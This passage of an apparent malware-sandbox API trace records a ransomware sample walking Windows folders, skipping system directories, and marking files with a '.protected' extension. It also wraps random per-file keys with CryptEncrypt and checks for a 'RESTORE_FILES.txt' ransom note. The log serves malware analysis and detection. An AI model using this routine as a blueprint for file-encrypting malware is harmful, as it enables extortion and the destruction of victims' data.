(normalized: "c:\\users\\all users\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.306] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0093.306] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0093.306] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned 49 [0093.306] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0093.306] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0093.306] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*") returned 51 [0093.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.306] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.306] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.306] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.306] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.306] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.306] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\.") returned 51 [0093.306] lstrcmpW 
(lpString1=".", lpString2=".") returned 0 [0093.307] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.307] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.307] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.307] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\." (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.307] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.307] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.307] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.307] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.307] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.307] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.307] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\..") returned 52 [0093.307] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.307] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.307] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.307] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.307] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.307] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\.." (normalized: "c:\\users\\all users\\microsoft\\wwansvc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.307] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.307] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.307] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt") returned 67 [0093.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.307] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.308] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.308] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\RESTORE_FILES.txt") returned 58 [0093.308] StrStrIW 
(lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.308] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.308] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.308] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.308] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\RESTORE_FILES.txt") returned 58 [0093.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.309] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.309] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RESTORE_FILES.txt") returned 50 [0093.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.309] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="Windows") returned -1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files") returned -1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files (x86)") returned -1 [0093.309] lstrcmpiW (lpString1="Microsoft 
Help", lpString2="$Recycle.bin") returned 1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="System Volume Information") returned -1 [0093.309] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help") returned 37 [0093.309] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0093.309] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0093.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*") returned 39 [0093.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.309] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.309] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\.") returned 39 [0093.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.309] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.310] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.310] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft Help\\..") returned 40 [0093.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="Windows") returned -1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="Program Files") returned -1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="System Volume Information") returned -1 [0093.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.protected") returned 54 [0093.310] StrStrIW (lpFirst="Hx.hxn.protected", lpSrch=".protected") returned=".protected" [0093.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.protected") returned 68 [0093.310] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.310] FindNextFileW (in: 
hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.protected") returned 72 [0093.311] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.protected") returned 68 [0093.311] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 
1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.protected") returned 69 [0093.311] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.protected") returned 71 [0093.311] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", 
lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.protected") returned 77 [0093.312] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.protected") returned 71 [0093.312] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 
[0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.protected") returned 75 [0093.312] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.protected") returned 68 [0093.312] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", 
lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.protected") returned 68 [0093.312] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.protected") returned 72 [0093.312] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW 
(lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.protected") returned 69 [0093.313] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.protected") returned 66 [0093.313] StrStrIW (lpFirst="MS.OIS.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW 
(lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.protected") returned 70 [0093.313] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.protected") returned 70 [0093.313] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", 
lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.protected") returned 74 [0093.313] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW 